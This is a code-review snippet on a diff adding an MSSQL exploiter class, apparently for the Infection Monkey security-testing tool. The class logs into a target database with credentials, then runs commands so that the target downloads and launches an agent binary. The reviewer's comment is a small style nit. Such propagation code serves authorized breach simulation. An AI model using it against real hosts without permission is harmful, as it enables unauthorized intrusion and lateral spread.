monkey/agent_plugins/exploiters/mssql/src/mssql_exploit_client.py

```diff
@@ -0,0 +1,155 @@
+    COMMAND_AND_SCRIPTING_INTERPRETER_T1059_TAG,
+    INGRESS_TOOL_TRANSFER_T1105_TAG,
+)
+
+
+class MSSQLExploitClient:
+    def __init__(
+        self,
+        exploiter_name: str,
+        agent_id: AgentID,
+        agent_event_publisher: IAgentEventPublisher,
+        mssql_client: MSSQLClient,
+    ):
+        self._exploiter_name = exploiter_name
+        self._agent_id = agent_id
+        self._agent_event_publisher = agent_event_publisher
+        self._client = mssql_client
+
+    def exploit_host(
+        self,
+        host: TargetHost,
+        options: MSSQLOptions,
+        credentials: Credentials,
+        download_agent_command: str,
+        launch_agent_command: str,
+        agent_binary_downloaded: Event,
+        ports_to_try: Set[NetworkPort],
+    ) -> Tuple[bool, bool]:
+        """
+        Exploit the host over MSSQL using the given credentials.
+
+        :param host: The host to exploit
+        :param credentials: The credentials to use
+        :param download_agent_command: The command to download the agent binary
+        :param launch_agent_command: The command to launch the agent binary
+        :param agent_binary_downloaded: An event that will be set when the agent binary
+            is downloaded
+        :return: A tuple of (exploitation_success, propagation_success)
+        """
+        exploitation_message = ""
+        exploitation_success = True
+
+        timestamp = time()
+        try:
+            self._client.login(host.ip, ports_to_try, credentials)
+        except Exception as err:
+            exploitation_message = f"Failed to login to MSSQL server on {host.ip}: {err}"
+            exploitation_success = False
+
+        self._publish_exploitation_event(
+            host, timestamp, exploitation_success, exploitation_message
+        )
+
+        if not exploitation_success:
+            logger.debug("Exploitation was unsuccessful, did not attempt propagation")
+            return (False, False)
+
+        propagation_success = self._propagate(
+            host,
+            download_agent_command,
+            launch_agent_command,
+            agent_binary_downloaded,
+            options.agent_binary_download_timeout,
+        )
+
+        return exploitation_success, propagation_success
+
+    def _propagate(
+        self,
+        host: TargetHost,
+        download_agent_command: str,
+        launch_agent_command: str,
+        agent_binary_downloaded: Event,
+        agent_binary_download_timeout: float,
+    ) -> bool:
+        propagation_message = ""
+        propagation_success = True
+        timestamp = time()
+        try:
+            # TODO: Roll download & run into a single command?
+            self._client.run_command(download_agent_command)
+
+            logger.debug("Waiting for the target to download the agent binary...")
+            agent_binary_downloaded.wait(agent_binary_download_timeout)
+            if agent_binary_downloaded.is_set():
```

Comment:
NIT

Alternatively:

```suggestion
            if agent_binary_downloaded.wait(agent_binary_download_timeout):
```